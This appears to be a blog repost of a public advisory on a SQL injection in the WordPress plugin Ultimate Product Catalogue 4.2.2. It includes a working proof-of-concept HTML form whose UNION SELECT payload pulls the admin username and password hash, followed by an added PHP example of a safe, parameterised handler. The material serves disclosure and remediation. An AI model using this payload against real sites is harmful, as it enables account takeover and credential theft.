WordPress Catalogue 4.2.2 Plugin - SQL Injection Vulnerability
Hi friends, today I am going to share with you the Catalogue 4.2.2 Plugin - SQL Injection Vulnerability.
# Exploit Title: Ultimate Product Catalogue 4.2.2 Sql Injection – Plugin WordPress – Sql Injection
# Exploit Author: Lenon Leite
# Vendor Homepage: https://wordpress.org/plugins/ultimate-product-catalogue/
# Software Link: https://wordpress.org/plugins/ultimate-product-catalogue/
# Category: webapps
# Version: 4.2.2
# Tested on: Ubuntu 16.04

1 - Description:
Type user access: register user.
$_POST['CatID'] is not escaped.
http://lenonleite.com.br/en/blog/2017/05/31/english-ultimate-product-catalogue-4-2-2-sql-injection/

2 - Proof of Concept:
1 – Login as regular user (created using wp-login.php?action=register)
2 – Using:
<*form method="post" action="http://target/wp-admin/admin-ajax.php?action=get_upcp_subcategories">
<*input type="text" name="CatID" value="0 UNION SELECT user_login,user_pass FROM wp_users WHERE ID=1">
<*input type="submit">
*delete “*” in code*

3 - Timeline:
- 22/05/2017 – Discovered
- 24/05/2017 – Vendor not found
- **/06/2017 - Corrected
***Rename plugin txt to zip. Problem with gmail block.
Thanks_Malik_Ubi0day
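
For site owners and plugin developers, here is how an AJAX handler for this action can treat CatID safely. This is an added example, not the plugin's own code or its actual fix: the function name, table name and column names are assumptions, and only the action name and the CatID parameter come from the advisory above.

```php
<?php
// Added illustration, not the plugin's source. Table, column and function
// names are hypothetical; the action name and CatID come from the advisory.

// wp_ajax_{action} fires for every logged-in user, including a
// self-registered subscriber, so the handler must treat CatID as hostile.
add_action( 'wp_ajax_get_upcp_subcategories', 'example_get_subcategories' );

function example_get_subcategories() {
    global $wpdb;
    $table = $wpdb->prefix . 'example_subcategories'; // hypothetical table

    // Pattern the advisory describes (shown as a comment only):
    //   "... WHERE Category_ID=" . $_POST['CatID']
    // Raw concatenation lets the value change the structure of the query.

    // 1. Accept only a plain non-negative integer; reject everything else.
    $raw = isset( $_POST['CatID'] ) ? wp_unslash( $_POST['CatID'] ) : '';
    if ( ! is_string( $raw ) || ! ctype_digit( $raw ) ) {
        wp_send_json_error( 'Invalid category id', 400 );
    }
    $cat_id = absint( $raw );

    // 2. Bind the value through a placeholder so it can only ever be data.
    $rows = $wpdb->get_results(
        $wpdb->prepare(
            "SELECT SubCategory_ID, SubCategory_Name
               FROM {$table}
              WHERE Category_ID = %d",
            $cat_id
        )
    );

    wp_send_json_success( $rows );
}
```

Validation and the `%d` placeholder are independent layers: either one alone stops a string such as the CatID value in the proof of concept from reaching the query as SQL.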